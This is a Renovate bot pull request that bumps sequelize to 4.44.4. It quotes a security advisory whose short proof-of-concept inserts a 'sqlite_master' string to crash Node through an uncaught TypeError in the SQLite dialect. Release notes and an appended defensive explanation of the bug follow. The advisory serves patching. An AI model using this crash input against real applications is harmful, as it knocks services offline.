spencermize / Veload

Indoor biking for the masses
https://veload.bike
GNU General Public License v3.0
0 stars 0 forks

Update dependency sequelize to v4.44.4 [SECURITY] #142

Open renovate[bot] opened 1 year ago

renovate[bot] commented 1 year ago

This PR contains the following updates:

| Package | Change |
|---|---|
| sequelize (source) | 4.43.0 -> 4.44.4 |

GitHub Vulnerability Alerts

GHSA-fw4p-36j9-rrj3

Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process:

```javascript
const Sequelize = require('sequelize');

// SQLite dialect with a file-backed database: the affected code path.
const sequelize = new Sequelize({
    dialect: 'sqlite',
    storage: 'database.sqlite'
});

// A model with a single string column. The name shadows the global
// TypeError constructor for the rest of this file; the PoC keeps the
// name used in the advisory.
const TypeError = sequelize.define('TypeError', {
    name: Sequelize.STRING,
});

// The inserted value carries the text "sqlite_master" into the INSERT
// statement. The SQLite dialect inspects the statement text and, for this
// INSERT, calls .map on a results value that is undefined; the TypeError is
// thrown inside the driver callback and not caught, so the Node process
// exits. Fixed in 4.44.4.
TypeError.sync({force: true}).then(() => {
    return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});
```

Recommendation

Upgrade to version 4.44.4 or later.


Release Notes

sequelize/sequelize (sequelize)

### [`v4.44.4`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.4)

[Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.44.3...v4.44.4)

##### Bug Fixes

- **sqlite:** properly catch errors ([#11877](https://togithub.com/sequelize/sequelize/issues/11877)) ([8931bf6](https://togithub.com/sequelize/sequelize/commit/8931bf6c567b4cb3b35de8993cf74c82008b4275))

### [`v4.44.3`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.3)

[Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.44.2...v4.44.3)

##### Security

This release fixes two security issues for MySQL, both affecting the same component. https://snyk.io/vuln/SNYK-JS-SEQUELIZE-450221

- **mysql:** json path security issues ([#11332](https://togithub.com/sequelize/sequelize/issues/11332)) ([efd2f40](https://togithub.com/sequelize/sequelize/commit/efd2f40))

### [`v4.44.2`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.2)

[Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.44.1...v4.44.2)

##### Bug Fixes

- use files and remove .npmignore ([6674a3c](https://togithub.com/sequelize/sequelize/commit/6674a3c))

### [`v4.44.1`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.1)

[Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.44.0...v4.44.1)

##### Bug Fixes

- **pool:** destroy pooled errors properly with replication ([#11140](https://togithub.com/sequelize/sequelize/issues/11140)) ([a1ccf04](https://togithub.com/sequelize/sequelize/commit/a1ccf04))

### [`v4.44.0`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.0)

[Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.43.2...v4.44.0)

##### Bug Fixes

- **redshift:** allow standard_conforming_strings option ([#10816](https://togithub.com/sequelize/sequelize/issues/10816)) ([a32263f](https://togithub.com/sequelize/sequelize/commit/a32263f))

##### Features

- **postgres:** enable standard conforming strings when required ([#10746](https://togithub.com/sequelize/sequelize/issues/10746)) ([c9d3a97](https://togithub.com/sequelize/sequelize/commit/c9d3a97))

### [`v4.43.2`](https://togithub.com/sequelize/sequelize/releases/tag/v4.43.2)

[Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.43.1...v4.43.2)

##### Bug Fixes

- **mssql:** subquery handling for order ([#10769](https://togithub.com/sequelize/sequelize/issues/10769)) ([73d7a65](https://togithub.com/sequelize/sequelize/commit/73d7a65))

### [`v4.43.1`](https://togithub.com/sequelize/sequelize/releases/tag/v4.43.1)

[Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.43.0...v4.43.1)

##### Bug Fixes

- **mysql:** boolean TINYINT support ([#10660](https://togithub.com/sequelize/sequelize/issues/10660)) ([2f92e21](https://togithub.com/sequelize/sequelize/commit/2f92e21))

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR was generated by Mend Renovate.
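The failure mode in the advisory above (a result handler keyed on the SQL text, fed an undefined result set for an INSERT, throwing inside a driver callback), modelled in plain JavaScript as an added example that is not sequelize's code; the hardened handler illustrates the defensive pattern and is not the upstream patch. The driver stand-in, table name and statements are constructed.

```javascript
// Constructed sample statements. POC_INSERT is the INSERT the advisory's
// proof of concept produces: the user-supplied value carries "sqlite_master"
// into the statement text (table name assumed; Sequelize pluralises models).
const SELECT_TABLES = "SELECT name FROM sqlite_master WHERE type='table'";
const POC_INSERT =
  "INSERT INTO `TypeErrors` (`name`) VALUES ('SELECT tbl_name FROM sqlite_master')";

// Stand-in for the database driver: a SELECT yields rows, while an INSERT
// yields no result set at all, which is where the undefined `results`
// named in the advisory comes from.
function fakeDriverResults(sql) {
  return /^\s*SELECT\b/i.test(sql)
    ? [{ name: 'TypeErrors' }, { name: 'sqlite_sequence' }]
    : undefined;
}

// Vulnerable post-processing: keyed on a substring anywhere in the SQL text
// and assuming `results` is always an array.
function vulnerableHandle(sql, results) {
  if (sql.includes('sqlite_master')) {
    return results.map((row) => row.name); // TypeError when results is undefined
  }
  return results;
}

// Hardened post-processing: only statements that return rows are treated as
// a sqlite_master lookup, and a missing result set is handled explicitly.
function hardenedHandle(sql, results) {
  const returnsRows = /^\s*(SELECT|PRAGMA|WITH)\b/i.test(sql);
  if (returnsRows && sql.includes('sqlite_master')) {
    return Array.isArray(results) ? results.map((row) => row.name) : [];
  }
  return results === undefined ? [] : results;
}

// Runs a statement through a handler the way the dialect would and reports
// whether the handler threw. In the real library the throw happens inside the
// driver callback on a later tick, so it never becomes a promise rejection;
// it is an uncaughtException and the Node process exits.
function execute(handler, sql) {
  try {
    return { ok: true, value: handler(sql, fakeDriverResults(sql)) };
  } catch (err) {
    return { ok: false, error: `${err.constructor.name}: ${err.message}` };
  }
}

console.log(execute(vulnerableHandle, POC_INSERT)); // ok: false, error starts with "TypeError:"
console.log(execute(hardenedHandle, POC_INSERT));   // { ok: true, value: [] }
```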